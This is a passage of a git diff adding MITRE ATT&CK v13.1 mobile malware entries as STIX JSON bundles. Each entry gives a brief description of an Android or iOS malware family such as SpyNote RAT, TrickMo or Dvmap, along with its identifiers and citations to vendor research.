Push Android malware family. (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. 
Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + }, + { + "source_name": "Ludwig-GhostPush", + "description": "Adrian Ludwig. (2016, November 29). The fight against Ghost Push continues. Retrieved December 12, 2016.", + "url": "https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi" + }, + { + "source_name": "Lookout-Gooligan", + "description": "Lookout. (2016, December 1). Ghost Push and Gooligan: One and the same. Retrieved December 12, 2016.", + "url": "https://blog.lookout.com/blog/2016/12/01/ghost-push-gooligan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23.json new file mode 100644 index 0000000000000000000000000000000000000000..e838e95545e41a90b701fbf572d6c722e2e0c665 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--a5eb8d93-d28a-4a6c-975d-f8955a72c273", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SpyNote RAT", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware's functionality. (Citation: Zscaler-SpyNote)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "SpyNote RAT" + ], + "type": "malware", + "id": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "created": "2017-10-25T14:48:45.794Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0305", + "external_id": "S0305" + }, + { + "source_name": "SpyNote RAT", + "description": "(Citation: Zscaler-SpyNote)" + }, + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21170624-89db-4e99-bf27-58d26be07c3a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21170624-89db-4e99-bf27-58d26be07c3a.json new file mode 100644 index 0000000000000000000000000000000000000000..e5bdc2782fb17e57b65a25dd7fd1efa6b469e045 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21170624-89db-4e99-bf27-58d26be07c3a.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--3394ec8e-87c4-45bd-aa99-a1579f3f86da", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Ohad Mana, Check Point", + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "TrickMo" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "type": "malware", + "created": "2020-04-24T17:46:31.111Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0427", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0427" + }, + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:57:37.561Z", + "name": "TrickMo", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) a 2FA bypass mobile banking trojan, most likely being distributed by [TrickBot](https://attack.mitre.org/software/S0266). [TrickMo](https://attack.mitre.org/software/S0427) has been primarily targeting users located in Germany.(Citation: SecurityIntelligence TrickMo)\n\n[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords.(Citation: SecurityIntelligence TrickMo) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901.json new file mode 100644 index 0000000000000000000000000000000000000000..7156926206adffaf94c1d0b2e782d6451f78e438 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--bf391fe1-9a25-402a-b45b-82fead99edb9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "INSOMNIA" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "type": "malware", + "created": "2020-06-02T14:32:31.461Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0463", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0463" + }, + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-24T18:24:35.433Z", + "name": "INSOMNIA", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22b596a6-d288-4409-8520-5f2846f85514.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22b596a6-d288-4409-8520-5f2846f85514.json new file mode 100644 index 0000000000000000000000000000000000000000..5aef030d9bb53a69558d1a9c03b7ddad32399aaf --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22b596a6-d288-4409-8520-5f2846f85514.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--c50a956e-ecce-407a-be0a-9b949626d2bc", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Dvmap" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "type": "malware", + "created": "2019-12-10T16:07:40.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0420", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0420" + }, + { + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "source_name": "SecureList DVMap June 2017" + } + ], + "modified": "2020-01-22T22:17:23.015Z", + "name": "Dvmap", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. It is credited with being the first malware that performs this type of code injection.(Citation: SecureList DVMap June 2017)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22faaa56-a8ac-4292-9be6-b571b255ee40.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22faaa56-a8ac-4292-9be6-b571b255ee40.json new file mode 100644 index 0000000000000000000000000000000000000000..5ef1a736d35c7bc984442bd01ceb0837b336d71d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--22faaa56-a8ac-4292-9be6-b571b255ee40.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--e5cea4f3-f1d7-41df-9757-a10610df012c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Zen" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "type": "malware", + "created": "2020-07-27T14:14:56.729Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0494", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0494" + }, + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-11T14:23:15.002Z", + "name": "Zen", + "description": "[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013.(Citation: Google Security Zen)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe.json new file mode 100644 index 0000000000000000000000000000000000000000..1a8f43caac646ff5bc49d377ead3da398841aaf4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--e2c13dcf-b3c2-4cc4-b18e-531e6346de72", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "NotCompatible", + "description": "[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. (Citation: Lookout-NotCompatible)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe", + "created": "2017-10-25T14:48:36.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0299", + "external_id": "S0299" + }, + { + "source_name": "NotCompatible", + "description": "(Citation: Lookout-NotCompatible)" + }, + { + "source_name": "Lookout-NotCompatible", + "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c.json new file mode 100644 index 0000000000000000000000000000000000000000..f8888f95f19c70893fbcd1e2736453bf145d8e7b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--625c2048-8ea8-48cf-834d-415b3ffc6346", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "XLoader for Android", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. It has more recently been observed targeting South Korean users as a pornography application.(Citation: TrendMicro-XLoader-FakeSpy)(Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "XLoader for Android" + ], + "type": "malware", + "id": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0318", + "external_id": "S0318" + }, + { + "source_name": "XLoader for Android", + "description": "(Citation: TrendMicro-XLoader)" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + }, + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. 
Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--28e39395-91e7-4f02-b694-5e079c964da9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--28e39395-91e7-4f02-b694-5e079c964da9.json new file mode 100644 index 0000000000000000000000000000000000000000..48f4263440226ed89fde64bfbd68120681b6bbf0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--28e39395-91e7-4f02-b694-5e079c964da9.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--dd50ce6e-a2b5-41ed-a290-68a28eb4cfcd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--28e39395-91e7-4f02-b694-5e079c964da9", + "created": "2017-10-25T14:48:46.107Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0306", + "external_id": "S0306" + }, + { + "source_name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--29944858-da52-4d3d-b428-f8a6eb8dde6f.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--29944858-da52-4d3d-b428-f8a6eb8dde6f.json new file mode 100644 index 0000000000000000000000000000000000000000..dd65e5ec3731006af6c57b286f216f03a701f898 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--29944858-da52-4d3d-b428-f8a6eb8dde6f.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--26d0b1b8-b678-4b2b-8e7a-881a06608342", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "XLoader for iOS" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "type": "malware", + "created": "2020-07-20T13:58:53.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0490", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0490" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2021-12-07T14:46:08.852Z", + "name": "XLoader for iOS", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information.(Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2aec175b-4429-4048-8e09-3ef6cbecfc64.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2aec175b-4429-4048-8e09-3ef6cbecfc64.json new file mode 100644 index 0000000000000000000000000000000000000000..ee61da4576c482c4b71a3d7782d1900a16e128f2 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--2aec175b-4429-4048-8e09-3ef6cbecfc64.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--852ae637-8c61-448f-b3b5-1a4d92e9beeb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T22:33:55.061Z", + "name": "AbstractEmu", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States, however victims are believed to be across a total of 17 countries.(Citation: lookout_abstractemu_1021)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "AbstractEmu" + ], + "type": "malware", + "id": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "created": "2023-02-06T18:48:41.442Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1061", + "external_id": "S1061" + }, + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb.json new file mode 100644 index 0000000000000000000000000000000000000000..f78441e448620905d1b50dfee802090c6e4604a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--b77c17d3-ae43-490d-9989-420b6b9727c0", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Exodus", + "Exodus One", + "Exodus Two" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "type": "malware", + "created": "2019-09-03T19:45:47.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0405", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0405" + }, + { + "source_name": "Exodus One", + "description": "(Citation: SWB Exodus March 2019)" + }, + { + "source_name": "Exodus Two", + "description": "(Citation: SWB Exodus March 2019)" + }, + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T17:15:52.191Z", + "name": "Exodus", + "description": "[Exodus](https://attack.mitre.org/software/S0405) is Android spyware deployed in two distinct stages named Exodus One (dropper) and Exodus Two (payload).(Citation: SWB Exodus March 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--317a2c10-d489-431e-b6b2-f0251fddc88e.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--317a2c10-d489-431e-b6b2-f0251fddc88e.json new file mode 100644 index 0000000000000000000000000000000000000000..708541c86c2dd85bd2d300daa6eb1f189a6f97b2 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--317a2c10-d489-431e-b6b2-f0251fddc88e.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--bd696d62-8af8-433c-aa13-90735085ac48", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Dendroid", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Dendroid" + ], + "type": "malware", + "id": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "created": "2017-10-25T14:48:37.438Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0301", + "external_id": "S0301" + }, + { + "source_name": "Dendroid", + "description": "(Citation: Lookout-Dendroid)" + }, + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb.json new file mode 100644 index 0000000000000000000000000000000000000000..7f51694bbcc028f0035b67899bca55d6710e4d5e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--9842f376-d90d-4705-b0b6-135e1fb6ed34", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "WireLurker", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "created": "2017-10-25T14:48:37.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0312", + "external_id": "S0312" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + }, + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3271c107-92c4-442e-9506-e76d62230ee8.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3271c107-92c4-442e-9506-e76d62230ee8.json new file mode 100644 index 0000000000000000000000000000000000000000..844ed1a483e04e598066dfd9aa6bff2ce23d44a9 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--3271c107-92c4-442e-9506-e76d62230ee8.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--28411bd5-b4de-4307-8630-5aeb5ac68356", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Desert Scorpion" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "type": "malware", + "created": "2020-09-11T14:54:16.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0505", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0505" + }, + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", 